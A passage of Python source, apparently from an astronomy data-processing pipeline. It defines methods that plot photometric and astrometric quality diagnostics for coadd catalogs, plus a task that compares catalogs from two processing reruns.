cumulative=cumulative,\n addDataList=[psfSnFluxGtLow, psfSnFluxGtHigh,\n psfUsedPsfSn],\n addDataLabelList=[\"Flux>{:.1f}\".format(lowFlux),\n \"Flux>{:.1f}\".format(highFlux),\n \"psf_used\"])\n\n skyplotKwargs = dict(stats=stats, matchRadius=matchRadius, matchRadiusUnitStr=None, zpLabel=zpLabel)\n\n yield from self.AnalysisClass(catalog[~bad], psfSn, \"%s\" % \"S/N = \" + shortName, shortName,\n self.config.analysis, qMin=0, qMax=1.25*highSn, labeller=AllLabeller(),\n ).plotSkyPosition(description, plotInfoDict, areaDict,\n dataName=\"all\", **skyplotKwargs)\n\n def plotStarGal(self, catalog, plotInfoDict, areaDict, matchRadius=None, zpLabel=None, forcedStr=None,\n highlightList=None, uberCalLabel=None):\n yield\n schema = getSchema(catalog)\n plotAllKwargs = dict(matchRadius=matchRadius, zpLabel=zpLabel, forcedStr=forcedStr,\n uberCalLabel=uberCalLabel)\n shortName = \"pStar\"\n self.log.info(\"shortName = {:s}\".format(shortName))\n yield from self.AnalysisClass(catalog, deconvMomStarGal, \"P(star) from deconvolved moments\",\n shortName, self.config.analysis, qMin=-0.1, qMax=1.39,\n labeller=StarGalaxyLabeller()\n ).plotAll(shortName, plotInfoDict, areaDict, self.log, **plotAllKwargs)\n shortName = \"deconvMom\"\n self.log.info(\"shortName = {:s}\".format(shortName))\n yield from self.AnalysisClass(catalog, deconvMom, \"Deconvolved moments\", shortName,\n self.config.analysis, qMin=-1.0, qMax=3.0,\n labeller=StarGalaxyLabeller()\n ).plotAll(shortName, plotInfoDict, areaDict, self.log,\n enforcer=Enforcer(requireLess={\"star\": {\"stdev\": 0.2}}),\n **plotAllKwargs)\n\n if \"ext_shapeHSM_HsmShapeRegauss_resolution\" in schema:\n shortName = \"resolution\"\n self.log.info(\"shortName = {:s}\".format(shortName))\n yield from self.AnalysisClass(catalog, catalog[\"ext_shapeHSM_HsmShapeRegauss_resolution\"],\n \"Resolution Factor from HsmRegauss\",\n shortName, self.config.analysis, qMin=-0.1, qMax=1.15,\n labeller=StarGalaxyLabeller()\n ).plotAll(shortName, plotInfoDict, areaDict, self.log,\n **plotAllKwargs)\n\n def plotCompareUnforced(self, forced, unforced, plotInfoDict, areaDict, zpLabel=None, fluxToPlotList=None,\n uberCalLabel=None, matchRadius=None, matchRadiusUnitStr=None, highlightList=None):\n yield\n forcedSchema = getSchema(forced)\n fluxToPlotList = fluxToPlotList if fluxToPlotList else self.config.fluxToPlotList\n unitStr = \"mmag\" if self.config.toMilli else \"mag\"\n enforcer = None\n for col in fluxToPlotList:\n magDiffFunc = MagDiff(col + \"_instFlux\", col + \"_instFlux\", unitScale=self.unitScale)\n shortName = \"compareUnforced_\" + col\n self.log.info(\"shortName = {:s}\".format(shortName))\n if col + \"_instFlux\" in forcedSchema:\n yield from self.AnalysisClass(forced, magDiffFunc(forced, unforced),\n \" Forced - Unforced mag [%s] (%s)\" %\n (fluxToPlotString(col), unitStr),\n shortName, self.config.analysis, prefix=\"\",\n labeller=OverlapsStarGalaxyLabeller(first=\"\", second=\"\"),\n unitScale=self.unitScale, compareCat=unforced,\n ).plotAll(shortName, plotInfoDict, areaDict, self.log,\n enforcer=enforcer, matchRadius=matchRadius,\n matchRadiusUnitStr=matchRadiusUnitStr,\n highlightList=highlightList,\n zpLabel=zpLabel, uberCalLabel=uberCalLabel)\n\n def isBad(self, source):\n \"\"\"Return True if any of config.badFlags are set for this source.\n \"\"\"\n for flag in self.config.analysis.flags:\n if source.get(flag):\n return True\n return False\n\n def overlaps(self, catalog, patchList, tractInfo):\n badForOverlap = makeBadArray(catalog, flagList=self.config.analysis.flags,\n onlyReadStars=self.config.onlyReadStars, patchInnerOnly=False)\n goodCat = catalog[~badForOverlap].copy(deep=True)\n overlapPatchList = []\n for patch1 in patchList:\n for patch2 in patchList:\n if patch1 != patch2:\n overlapping = checkPatchOverlap([patch1, patch2], tractInfo)\n if overlapping:\n if {patch1, patch2} not in overlapPatchList:\n overlapPatchList.append({patch1, patch2})\n matchList = []\n matchRadius = self.config.matchOverlapRadius\n for patchPair in overlapPatchList:\n patchPair = list(patchPair)\n patchCat1 = goodCat[goodCat[\"patchId\"] == patchPair[0]].copy(deep=True)\n patchCat2 = goodCat[goodCat[\"patchId\"] == patchPair[1]].copy(deep=True)\n if len(patchCat1) > 0 and len(patchCat2) > 0:\n patchPairMatches = matchAndJoinCatalogs(patchCat1, patchCat2, matchRadius, log=self.log)\n if not patchPairMatches.empty:\n matchList.append(patchPairMatches)\n else:\n self.log.info(\"No \\\"good\\\" overlapping objects between patches {} and {}\".\n format(patchPair[0], patchPair[1]))\n else:\n self.log.info(\"No \\\"good\\\" overlapping objects between patches {} and {}\".\n format(patchPair[0], patchPair[1]))\n if matchList:\n matches = pd.concat(matchList, axis=0)\n else:\n matches = None\n return matches\n\n def plotOverlaps(self, overlaps, plotInfoDict, areaDict, matchRadius=None, matchRadiusUnitStr=None,\n zpLabel=None, forcedStr=None, postFix=\"\", fluxToPlotList=None, highlightList=None,\n uberCalLabel=None):\n yield\n schema = getSchema(overlaps)\n if not fluxToPlotList:\n fluxToPlotList = self.config.fluxToPlotList\n unitStr = \"mmag\" if self.config.toMilli else \"mag\"\n magEnforcer = Enforcer(requireLess={\"star\": {\"stdev\": 0.003*self.unitScale}})\n plotAllKwargs = dict(matchRadius=matchRadius, matchRadiusUnitStr=matchRadiusUnitStr, zpLabel=zpLabel,\n forcedStr=forcedStr, uberCalLabel=uberCalLabel, highlightList=highlightList)\n for col in fluxToPlotList:\n shortName = \"overlap_\" + col + postFix\n self.log.info(\"shortName = {:s}\".format(shortName))\n if \"first_\" + col + \"_instFlux\" in schema:\n yield from self.AnalysisClass(overlaps, MagDiff(\"first_\" + col + \"_instFlux\",\n \"second_\" + col + \"_instFlux\",\n unitScale=self.unitScale),\n \" Overlap mag difference (%s) (%s)\" %\n (fluxToPlotString(col), unitStr),\n shortName, self.config.analysis, prefix=\"first_\",\n flags=[col + \"_flag\"], labeller=OverlapsStarGalaxyLabeller(),\n magThreshold=23, unitScale=self.unitScale\n ).plotAll(shortName, plotInfoDict, areaDict, self.log,\n enforcer=magEnforcer, **plotAllKwargs)\n unitStr = \"mas\" if self.config.toMilli else \"arcsec\"\n distEnforcer = Enforcer(requireLess={\"star\": {\"stdev\": 0.005*self.unitScale}})\n shortName = \"overlap_distance\" + postFix\n self.log.info(\"shortName = {:s}\".format(shortName))\n yield from self.AnalysisClass(\n overlaps, lambda cat: cat[\"distance\"]*(1.0*geom.radians).asArcseconds()*self.unitScale,\n \"Distance (%s)\" % unitStr, shortName, self.config.analysis, prefix=\"first_\", qMin=-0.01,\n qMax=0.11, labeller=OverlapsStarGalaxyLabeller(), forcedMean=0.0,\n unitScale=self.unitScale).plotAll(shortName, plotInfoDict, areaDict, self.log,\n enforcer=distEnforcer, doPrintMedian=True, **plotAllKwargs)\n\n def plotPhotomMatches(self, matches, plotInfoDict, areaDict, refObjLoader, description=\"matches\",\n matchRadius=None, matchRadiusUnitStr=None, zpLabel=None, forcedStr=None,\n highlightList=None, uberCalLabel=None):\n yield\n schema = getSchema(matches)\n unitStr = \"mmag\" if self.config.toMilli else \"mag\"\n enforcer = None # Enforcer(requireLess={\"star\": {\"stdev\": 0.030*self.unitScale}}),\n fluxToPlotList = [\"base_PsfFlux\", \"base_CircularApertureFlux_12_0\"]\n plotAllKwargs = dict(zpLabel=zpLabel, forcedStr=forcedStr, uberCalLabel=uberCalLabel,\n highlightList=highlightList)\n if self.config.doApplyColorTerms:\n ct = self.config.colorterms.getColorterm(plotInfoDict[\"filter\"], refObjLoader.ref_dataset_name)\n else:\n # Pass in a null colorterm.\n # Obtain the filter name from the reference loader filter map, if\n # present, otherwise set to the canonical filter name.\n if plotInfoDict[\"filter\"] in refObjLoader.filterMap.keys():\n refFilterName = refObjLoader.filterMap[plotInfoDict[\"filter\"]]\n else:\n refFilterName = afwImage.Filter(afwImage.Filter(plotInfoDict[\"filter\"]).getId()).getName()\n ct = Colorterm(primary=refFilterName, secondary=refFilterName)\n self.log.warning(\"Note: no colorterms loaded for {:s}, thus no colorterms will be applied to \"\n \"the photometry reference catalog\".format(refObjLoader.ref_dataset_name))\n\n # Magnitude difference plots\n for flux in fluxToPlotList:\n fluxName = flux + \"_instFlux\"\n if highlightList is not None:\n if not any(\"src_\" + flux + \"_flag\" in highlight for highlight in highlightList):\n matchHighlightList = highlightList + [(\"src_\" + flux + \"_flag\", 0, \"yellow\"), ]\n plotAllKwargs.update(highlightList=matchHighlightList)\n if \"src_calib_psf_used\" in schema:\n shortName = description + \"_\" + fluxToPlotString(fluxName) + \"_mag_calib_psf_used\"\n self.log.info(\"shortName = {:s}\".format(shortName))\n yield from self.AnalysisClass(\n matches, MagDiffMatches(fluxName, ct, zp=0.0, unitScale=self.unitScale),\n \"%s - ref (calib_psf_used) (%s)\" % (fluxToPlotString(fluxName), unitStr), shortName,\n self.config.analysisPhotomMatches, prefix=\"src_\", goodKeys=[\"calib_psf_used\"],\n labeller=MatchesStarGalaxyLabeller(), unitScale=self.unitScale).plotAll(\n shortName, plotInfoDict, areaDict, self.log, enforcer=enforcer, **plotAllKwargs)\n if \"src_calib_photometry_used\" in schema:\n shortName = description + \"_\" + fluxToPlotString(fluxName) + \"_mag_calib_photometry_used\"\n self.log.info(\"shortName = {:s}\".format(shortName))\n yield from self.AnalysisClass(\n matches, MagDiffMatches(fluxName, ct, zp=0.0, unitScale=self.unitScale),\n \" %s - ref (calib_photom_used) (%s)\" % (fluxToPlotString(fluxName), unitStr),\n shortName, self.config.analysisPhotomMatches, prefix=\"src_\",\n goodKeys=[\"calib_photometry_used\"], labeller=MatchesStarGalaxyLabeller(),\n unitScale=self.unitScale).plotAll(\n shortName, plotInfoDict, areaDict, self.log, enforcer=enforcer, **plotAllKwargs)\n shortName = description + \"_\" + fluxToPlotString(fluxName)\n self.log.info(\"shortName = {:s}\".format(shortName))\n yield from self.AnalysisClass(\n matches, MagDiffMatches(fluxName, ct, zp=0.0, unitScale=self.unitScale),\n \" %s - ref (%s)\" % (fluxToPlotString(fluxName), unitStr), shortName,\n self.config.analysisPhotomMatches, prefix=\"src_\", labeller=MatchesStarGalaxyLabeller(),\n unitScale=self.unitScale).plotAll(shortName, plotInfoDict, areaDict, self.log,\n enforcer=enforcer, matchRadius=matchRadius,\n matchRadiusUnitStr=matchRadiusUnitStr, **plotAllKwargs)\n\n plotAllKwargs.update(highlightList=highlightList)\n\n def plotAstromMatches(self, matches, plotInfoDict, areaDict, refObjLoader, unpackedMatches=None,\n description=\"matches\", matchRadius=None, matchRadiusUnitStr=None, zpLabel=None,\n forcedStr=None, highlightList=None, uberCalLabel=None):\n yield\n if unpackedMatches is None:\n if \"patch\" not in plotInfoDict[\"dataId\"]:\n self.log.info(\"The denormalizing of the persisted srcMatch failed (or was not done). \"\n \"Thus, the plots associated with the calib_astrometry_used flag will only \"\n \"include those that made it into the generically matched catalogs (which \"\n \"may not included all of those sources that were used in SFM astrometric \"\n \"calibration.\")\n unpackedMatches = matches\n self.unpackedMatchLabel = forcedStr\n unpackedSchema = getSchema(unpackedMatches)\n unitStr = \"mmag\" if self.config.toMilli else \"mag\"\n enforcer = None # Enforcer(requireLess={\"star\": {\"stdev\": 0.030*self.unitScale}}),\n plotAllKwargs = dict(uberCalLabel=uberCalLabel, highlightList=highlightList)\n\n # Astrometry (positional) difference plots\n unitStr = \"mas\" if self.config.toMilli else \"arcsec\"\n qMatchScale = matchRadius if matchRadius else self.matchRadius\n if \"src_calib_astrometry_used\" in unpackedSchema:\n shortName = description + \"_distance_calib_astrometry_used\"\n self.log.info(\"shortName = {:s}\".format(shortName))\n\n yield from self.AnalysisClass(\n unpackedMatches, lambda cat: cat[\"distance\"]*(1.0*geom.radians).asArcseconds()*self.unitScale,\n \"Distance (%s) (calib_astrom_used in SFM)\" % unitStr, shortName,\n self.config.analysisAstromMatches, prefix=\"src_\", goodKeys=[\"calib_astrometry_used\"],\n qMin=-0.02*qMatchScale, qMax=0.6*qMatchScale, labeller=MatchesStarGalaxyLabeller(),\n unitScale=self.unitScale).plotAll(shortName, plotInfoDict, areaDict, self.log,\n enforcer=enforcer, doPrintMedian=True,\n forcedStr=self.unpackedMatchLabel,\n zpLabel=self.zpLabelPacked, **plotAllKwargs)\n shortName = description + \"_distance\"\n self.log.info(\"shortName = {:s}\".format(shortName))\n stdevEnforcer = Enforcer(requireLess={\"star\": {\"stdev\": 0.050*self.unitScale}})\n yield from self.AnalysisClass(\n matches, lambda cat: cat[\"distance\"]*(1.0*geom.radians).asArcseconds()*self.unitScale,\n \"Distance (%s)\" % unitStr, shortName, self.config.analysisAstromMatches, prefix=\"src_\",\n qMin=-0.02*qMatchScale, qMax=0.6*qMatchScale, labeller=MatchesStarGalaxyLabeller(),\n forcedMean=0.0, unitScale=self.unitScale).plotAll(\n shortName, plotInfoDict, areaDict, self.log, enforcer=stdevEnforcer, doPrintMedian=True,\n matchRadius=matchRadius, matchRadiusUnitStr=matchRadiusUnitStr, forcedStr=forcedStr,\n zpLabel=zpLabel, **plotAllKwargs)\n if \"src_calib_astrometry_used\" in unpackedSchema:\n shortName = description + \"_raCosDec_calib_astrometry_used\"\n self.log.info(\"shortName = {:s}\".format(shortName))\n yield from self.AnalysisClass(\n unpackedMatches, AstrometryDiff(\"src_coord_ra\", \"ref_coord_ra\", declination1=\"src_coord_dec\",\n declination2=\"ref_coord_dec\", unitScale=self.unitScale),\n r\" $\\delta_{RA}$ = $\\Delta$RA*cos(Dec) (%s) (calib_astrom_used in SFM)\" % unitStr,\n shortName, self.config.analysisAstromMatches, prefix=\"src_\",\n goodKeys=[\"calib_astrometry_used\"], labeller=MatchesStarGalaxyLabeller(),\n unitScale=self.unitScale).plotAll(\n shortName, plotInfoDict, areaDict, self.log, enforcer=enforcer,\n forcedStr=self.unpackedMatchLabel, zpLabel=self.zpLabelPacked, **plotAllKwargs)\n shortName = description + \"_raCosDec\"\n self.log.info(\"shortName = {:s}\".format(shortName))\n stdevEnforcer = Enforcer(requireLess={\"star\": {\"stdev\": 0.050*self.unitScale}})\n yield from self.AnalysisClass(\n matches, AstrometryDiff(\"src_coord_ra\", \"ref_coord_ra\", declination1=\"src_coord_dec\",\n declination2=\"ref_coord_dec\", unitScale=self.unitScale),\n r\"$\\delta_{RA}$ = $\\Delta$RA*cos(Dec) (%s)\" % unitStr, shortName,\n self.config.analysisAstromMatches, prefix=\"src_\", labeller=MatchesStarGalaxyLabeller(),\n unitScale=self.unitScale).plotAll(\n shortName, plotInfoDict, areaDict, self.log, enforcer=stdevEnforcer,\n matchRadius=matchRadius, matchRadiusUnitStr=matchRadiusUnitStr, forcedStr=forcedStr,\n zpLabel=zpLabel, **plotAllKwargs)\n if \"src_calib_astrometry_used\" in unpackedSchema:\n shortName = description + \"_ra_calib_astrometry_used\"\n self.log.info(\"shortName = {:s}\".format(shortName))\n yield from self.AnalysisClass(\n unpackedMatches, AstrometryDiff(\"src_coord_ra\", \"ref_coord_ra\", unitScale=self.unitScale),\n r\"$\\Delta$RA (%s) (calib_astrom_used in SFM)\" % unitStr, shortName,\n self.config.analysisAstromMatches, prefix=\"src_\", goodKeys=[\"calib_astrometry_used\"],\n labeller=MatchesStarGalaxyLabeller(), unitScale=self.unitScale).plotAll(\n shortName, plotInfoDict, areaDict, self.log, enforcer=enforcer,\n forcedStr=self.unpackedMatchLabel, zpLabel=self.zpLabelPacked, **plotAllKwargs)\n shortName = description + \"_ra\"\n self.log.info(\"shortName = {:s}\".format(shortName))\n yield from self.AnalysisClass(\n matches, AstrometryDiff(\"src_coord_ra\", \"ref_coord_ra\", unitScale=self.unitScale),\n r\"$\\Delta$RA (%s)\" % unitStr, shortName, self.config.analysisAstromMatches, prefix=\"src_\",\n labeller=MatchesStarGalaxyLabeller(), unitScale=self.unitScale).plotAll(\n shortName, plotInfoDict, areaDict, self.log, enforcer=stdevEnforcer, matchRadius=matchRadius,\n matchRadiusUnitStr=matchRadiusUnitStr, forcedStr=forcedStr, zpLabel=zpLabel, **plotAllKwargs)\n if \"src_calib_astrometry_used\" in unpackedSchema:\n shortName = description + \"_dec_calib_astrometry_used\"\n self.log.info(\"shortName = {:s}\".format(shortName))\n yield from self.AnalysisClass(\n unpackedMatches, AstrometryDiff(\"src_coord_dec\", \"ref_coord_dec\", unitScale=self.unitScale),\n r\"$\\delta_{Dec}$ (%s) (calib_astrom_used in SFM)\" % unitStr, shortName,\n self.config.analysisAstromMatches, prefix=\"src_\", goodKeys=[\"calib_astrometry_used\"],\n labeller=MatchesStarGalaxyLabeller(), unitScale=self.unitScale).plotAll(\n shortName, plotInfoDict, areaDict, self.log, enforcer=enforcer,\n forcedStr=self.unpackedMatchLabel, zpLabel=self.zpLabelPacked, **plotAllKwargs)\n shortName = description + \"_dec\"\n self.log.info(\"shortName = {:s}\".format(shortName))\n yield from self.AnalysisClass(\n matches, AstrometryDiff(\"src_coord_dec\", \"ref_coord_dec\", unitScale=self.unitScale),\n r\"$\\delta_{Dec}$ (%s)\" % unitStr, shortName, self.config.analysisAstromMatches, prefix=\"src_\",\n labeller=MatchesStarGalaxyLabeller(), unitScale=self.unitScale).plotAll(\n shortName, plotInfoDict, areaDict, self.log, enforcer=stdevEnforcer, matchRadius=matchRadius,\n matchRadiusUnitStr=matchRadiusUnitStr, forcedStr=forcedStr, zpLabel=zpLabel, **plotAllKwargs)\n\n def plotCosmos(self, catalog, plotInfoDict, areaDict, cosmos):\n labeller = CosmosLabeller(cosmos, self.config.matchRadiusRaDec*geom.arcseconds)\n self.AnalysisClass(catalog, deconvMom, \"Deconvolved moments\", \"cosmos\", self.config.analysis,\n qMin=-1.0, qMax=6.0, labeller=labeller,\n ).plotAll(\"cosmos\", plotInfoDict, areaDict, self.log,\n enforcer=Enforcer(requireLess={\"star\": {\"stdev\": 0.2}}))\n\n def matchCatalog(self, catalog, filterName, astrometryConfig):\n try: # lsst.meas.extensions.astrometryNet is not setup by default\n from lsst.meas.extensions.astrometryNet import LoadAstrometryNetObjectsTask # noqa : F401\n except ImportError:\n return None\n refObjLoader = LoadAstrometryNetObjectsTask(self.config.refObjLoaderConfig)\n center = geom.averageSpherePoint([src.getCoord() for src in catalog])\n radius = max(center.separation(src.getCoord()) for src in catalog)\n filterName = afwImage.Filter(afwImage.Filter(filterName).getId()).getName() # Get primary name\n refs = refObjLoader.loadSkyCircle(center, radius, filterName).refCat\n matches = afwTable.matchRaDec(refs, catalog, self.config.matchRadiusRaDec*geom.arcseconds)\n matches = matchNanojanskyToAB(matches)\n return joinMatches(matches, \"ref_\", \"src_\")\n\n def plotRhoStatistics(self, catalog, plotInfoDict, zpLabel=None,\n forcedStr=None, postFix=\"\", uberCalLabel=None):\n \"\"\"Plot Rho Statistics with stars used for PSF modelling and non-PSF\n stars.\n \"\"\"\n yield\n stats = None\n\n # First do for calib_psf_used only.\n shortName = \"Rho\" + postFix + \"_calib_psf_used\"\n psfUsed = catalog[catalog[\"calib_psf_used\"]].copy(deep=True)\n self.log.info(\"shortName = {:s}\".format(shortName))\n yield from self.AnalysisClass(psfUsed, None,\n (\" Rho Statistics (calib_psf_used): \"),\n shortName, self.config.analysis,\n goodKeys=[\"calib_psf_used\"], labeller=None\n ).plotRhoStatistics(shortName, plotInfoDict, self.log,\n treecorrParams=self.config.treecorrParams,\n stats=stats, zpLabel=zpLabel, forcedStr=forcedStr,\n uberCalLabel=uberCalLabel, verifyJob=self.verifyJob)\n\n # Now for all stars.\n shortName = \"Rho\" + postFix + \"_all_stars\"\n starsOnly = catalog[catalog[\"base_ClassificationExtendedness_value\"] < 0.5].copy(deep=True)\n self.log.info(\"shortName = {:s}\".format(shortName))\n yield from self.AnalysisClass(starsOnly, None,\n (\" Rho Statistics: \"),\n shortName, self.config.analysis, flags=[], labeller=None\n ).plotRhoStatistics(shortName, plotInfoDict, self.log,\n treecorrParams=self.config.treecorrParams,\n stats=stats, zpLabel=zpLabel, forcedStr=forcedStr,\n uberCalLabel=uberCalLabel, verifyJob=self.verifyJob)\n\n def plotQuiver(self, catalog, description, plotInfoDict, areaDict, matchRadius=None,\n zpLabel=None, forcedStr=None, postFix=\"\", flagsCat=None, uberCalLabel=None, scale=1):\n yield\n stats = None\n shortName = \"quiver\"\n self.log.info(\"shortName = {:s}\".format(shortName))\n yield from self.AnalysisClass(catalog, None, \"%s\" % shortName, shortName,\n self.config.analysis, labeller=None,\n ).plotQuiver(catalog, description, plotInfoDict, areaDict, self.log,\n stats=stats, zpLabel=zpLabel, forcedStr=forcedStr,\n uberCalLabel=uberCalLabel, scale=scale)\n\n def plotSkyObjects(self, catalog, description, plotInfoDict, areaDict, zpLabel=None, forcedStr=None,\n postFix=\"\", flagsCat=None):\n yield\n stats = None\n shortName = \"skyObjects\"\n self.log.info(\"shortName = {:s}\".format(shortName))\n yield from self.AnalysisClass(catalog, None, \"%s\" % shortName, shortName, self.config.analysis,\n labeller=None,).plotSkyObjects(catalog, shortName, plotInfoDict,\n self.log, zpLabel=zpLabel,\n forcedStr=forcedStr,\n verifyJob=self.verifyJob)\n\n skyplotKwargs = dict(stats=stats, zpLabel=zpLabel, forcedStr=forcedStr)\n skyFlux = \"base_CircularApertureFlux_9_0_instFlux\"\n skyFluxStr = fluxToPlotString(skyFlux)\n skyFluxes = catalog[skyFlux]*1e12\n qMin, qMax = 0.75*np.nanmin(skyFluxes), 0.75*np.nanmax(skyFluxes)\n yield from self.AnalysisClass(catalog, skyFluxes,\n \"%s\" % \"flux(*1e+12)= \" + shortName + \"[\" + skyFluxStr + \"]\", shortName,\n self.config.analysis, qMin=qMin, qMax=qMax, labeller=AllLabeller(),\n fluxColumn=skyFlux, magThreshold=99.0\n ).plotSkyPosition(shortName, plotInfoDict, areaDict,\n dataName=\"all\", **skyplotKwargs)\n\n def plotSkyObjectsSky(self, catalog, description, plotInfoDict, forcedStr=None, alpha=0.7,\n doPlotTractImage=True, doPlotPatchOutline=True, sizeFactor=3.0, maxDiamPix=1000,\n columnName=\"base_CircularApertureFlux_9_0_instFlux\"):\n yield\n shortName = \"skyObjectsSky\"\n self.log.info(\"shortName = {:s}\".format(shortName))\n yield from self.AnalysisClass(catalog, None, \"%s\" % shortName, shortName, self.config.analysis,\n labeller=None,).plotInputCounts(catalog, plotInfoDict, self.log,\n forcedStr=forcedStr,\n alpha=alpha,\n doPlotTractImage=doPlotTractImage,\n doPlotPatchOutline=doPlotPatchOutline,\n sizeFactor=sizeFactor,\n maxDiamPix=maxDiamPix,\n columnName=columnName)\n\n def plotInputCounts(self, catalog, description, plotInfoDict, zpLabel=None, forcedStr=None,\n uberCalLabel=None, alpha=0.5, doPlotPatchOutline=True, sizeFactor=5.0,\n maxDiamPix=1000):\n yield\n shortName = \"inputCounts\"\n self.log.info(\"shortName = {:s}\".format(shortName))\n yield from self.AnalysisClass(catalog, None, \"%s\" % shortName, shortName,\n self.config.analysis, labeller=None,\n ).plotInputCounts(catalog, description, plotInfoDict, self.log,\n forcedStr=forcedStr, uberCalLabel=uberCalLabel,\n alpha=alpha, doPlotPatchOutline=doPlotPatchOutline,\n sizeFactor=sizeFactor, maxDiamPix=maxDiamPix)\n\n def _getConfigName(self):\n return None\n\n def _getMetadataName(self):\n return None\n\n def _getEupsVersionsName(self):\n return None\n\n\nclass CompareCoaddAnalysisConfig(CoaddAnalysisConfig):\n doReadParquetTables1 = Field(dtype=bool, default=True,\n doc=(\"Read parquet tables from postprocessing (e.g. deepCoadd_obj) as \"\n \"input1 data instead of afwTable catalogs.\"))\n doReadParquetTables2 = Field(dtype=bool, default=True,\n doc=(\"Read parquet tables from postprocessing (e.g. deepCoadd_obj) as \"\n \"input2 data instead of afwTable catalogs.\"))\n\n def setDefaults(self):\n CoaddAnalysisConfig.setDefaults(self)\n self.matchRadiusRaDec = 0.2\n self.matchRadiusXy = 1.0e-5 # has to be bigger than absolute zero\n if \"base_PsfFlux\" not in self.fluxToPlotList:\n self.fluxToPlotList.append(\"base_PsfFlux\") # Add PSF flux to default list for comparison scripts\n\n\nclass CompareCoaddAnalysisRunner(TaskRunner):\n @staticmethod\n def getTargetList(parsedCmd, **kwargs):\n kwargs[\"subdir\"] = parsedCmd.subdir\n rootDir = parsedCmd.input.split(\"rerun\")[0] if len(parsedCmd.rerun) == 2 else parsedCmd.input\n butlerArgs = dict(root=os.path.join(rootDir, \"rerun\", parsedCmd.rerun2))\n if parsedCmd.collection is not None:\n if parsedCmd.instrument is None:\n raise RuntimeError(\"Must provide --instrument command line option for gen3 repos.\")\n butler2 = dafButler.Butler(parsedCmd.rerun2, collections=parsedCmd.collection,\n instrument=parsedCmd.instrument)\n else:\n butlerArgs = dict(root=os.path.join(rootDir, \"rerun\", parsedCmd.rerun2))\n if parsedCmd.calib is not None:\n butlerArgs[\"calibRoot\"] = parsedCmd.calib\n butler2 = Butler(**butlerArgs)\n # parsedCmd.butler = butler2\n idParser = parsedCmd.id.__class__(parsedCmd.id.level)\n idParser.idList = parsedCmd.id.idList\n idParser.makeDataRefList(parsedCmd)\n\n if parsedCmd.collection is None:\n butler = parsedCmd.butler\n parsedCmd.butler = butler2\n idParser.makeDataRefList(parsedCmd)\n parsedCmd.butler = butler\n rerun2RefList = idParser.refList\n else:\n tract = parsedCmd.id.refList[0][0].dataId[\"tract\"]\n skyMap = butler2.get(\"skyMap\")\n tractInfo = skyMap.generateTract(tract)\n # Create a mapping from N,N patchId of Gen2 to integer id of Gen3\n patchIdToGen3Map = {}\n for patch in tractInfo:\n patchIndexStr = str(patch.getIndex()[0]) + \",\" + str(patch.getIndex()[1])\n patchIdToGen3Map[patchIndexStr] = tractInfo.getSequentialPatchIndex(patch)\n\n patchList = []\n gen3RefList = []\n for pId in parsedCmd.id.refList[0]:\n patchList.append(pId.dataId[\"patch\"])\n gen3PidList = idParser.idList.copy()\n if len(gen3PidList) < len(patchList):\n gen3PidList = gen3PidList*len(patchList)\n for gen3Pid, patchId in zip(gen3PidList, patchList):\n gen3PidCopy = copy.deepcopy(gen3Pid)\n if \"filter\" in gen3PidCopy:\n gen3PidCopy[\"physical_filter\"] = gen3PidCopy.pop(\"filter\")\n if parsedCmd.instrument == \"HSC\":\n gen3PidCopy[\"band\"] = filterToBandMap[gen3PidCopy[\"physical_filter\"]]\n gen3PidCopy[\"skymap\"] = \"hsc_rings_v1\"\n elif parsedCmd.instrument == \"LSSTCam-imSim\":\n gen3PidCopy[\"band\"] = gen3PidCopy[\"physical_filter\"]\n gen3PidCopy[\"skymap\"] = \"DC2\"\n else:\n raise RuntimeError(\"Unknown instrument {}. Currently only know HSC and \"\n \"LSSTCam-imSim.\".format(parsedCmd.instrument))\n gen3PidCopy[\"dataId\"] = gen3PidCopy.copy()\n gen3PidCopy[\"butler\"] = butler2\n gen3PidCopy[\"dataId\"][\"patch\"] = patchIdToGen3Map[patchId]\n gen3PidCopy[\"patch\"] = patchIdToGen3Map[patchId]\n gen3PidCopy[\"patchId\"] = patchId\n gen3PidCopy[\"camera\"] = parsedCmd.instrument\n gen3RefList.append(gen3PidCopy)\n rerun2RefList = [gen3RefList]\n\n return [(refList1, dict(patchRefList2=refList2, **kwargs)) for\n refList1, refList2 in zip(parsedCmd.id.refList, rerun2RefList)]\n\n\nclass CompareCoaddAnalysisTask(CoaddAnalysisTask):\n ConfigClass = CompareCoaddAnalysisConfig\n RunnerClass = CompareCoaddAnalysisRunner\n _DefaultName = \"compareCoaddAnalysis\"\n\n @classmethod\n def _makeArgumentParser(cls):\n parser = ArgumentParser(name=cls._DefaultName)\n parser.add_argument(\"--rerun2\", required=True, help=\"Second rerun, for comparison\")\n parser.add_argument(\"--collection\", required=False, default=None,\n help=\"Collection for rerun2 if it is Gen3\")\n parser.add_argument(\"--instrument\", required=False, default=None,\n help=\"Instrument for run if it is Gen3\")\n parser.add_id_argument(\"--id\", \"deepCoadd_forced_src\",\n help=\"data ID, e.g. --id tract=12345 patch=1,2 filter=HSC-X\",\n ContainerClass=TractDataIdContainer)\n parser.add_argument(\"--subdir\", type=str, default=\"\",\n help=(\"Subdirectory below plots/filter/tract-NNNN/ (useful for, \"\n \"e.g., subgrouping of Patches. Ignored if only one Patch is \"\n \"specified, in which case the subdir is set to patch-NNN\"))\n return parser\n\n def __init__(self, *args, **kwargs):\n CmdLineTask.__init__(self, *args, **kwargs)\n self.unitScale = 1000.0 if self.config.toMilli else 1.0\n self.matchRadius = self.config.matchRadiusXy if self.config.matchXy else self.config.matchRadiusRaDec\n self.matchRadiusUnitStr = \" (pixels)\" if self.config.matchXy else \"\\\"\"\n\n def runDataRef(self, patchRefList1, patchRefList2, subdir=\"\"):\n plotList = []\n haveForced = True # do forced datasets exist (may not for single band datasets)?\n dataset1 = \"Coadd_obj\" if self.config.doReadParquetTables1 else \"Coadd_forced_src\"\n patchRefExistsList1 = [patchRef1 for patchRef1 in patchRefList1 if\n patchRef1.datasetExists(self.config.coaddName + dataset1)]\n dataset2 = \"Coadd_obj\" if self.config.doReadParquetTables2 else \"Coadd_forced_src\"\n\n repoInfo2 = None\n for patchRef2 in patchRefList2: # Find an existing rerun2 dataset to assess if gen3\n try:\n repoInfo2 = getRepoInfo(patchRef2, coaddName=self.config.coaddName, coaddDataset=dataset2)\n break\n except Exception:\n if hasattr(patchRef2, \"dataId\"):\n dataId = patchRef2.dataId\n else:\n dataId = patchRef2[\"dataId\"]\n self.log.info(\"No patch found for {} in rerun2. Continuing search down patchRefList2.\".\n format(dataId))\n continue\n if repoInfo2 is None:\n raise TaskError(\"No data exists in patRefList2...\")\n\n if not repoInfo2.isGen3:\n patchRefExistsList2 = [patchRef2 for patchRef2 in patchRefList2 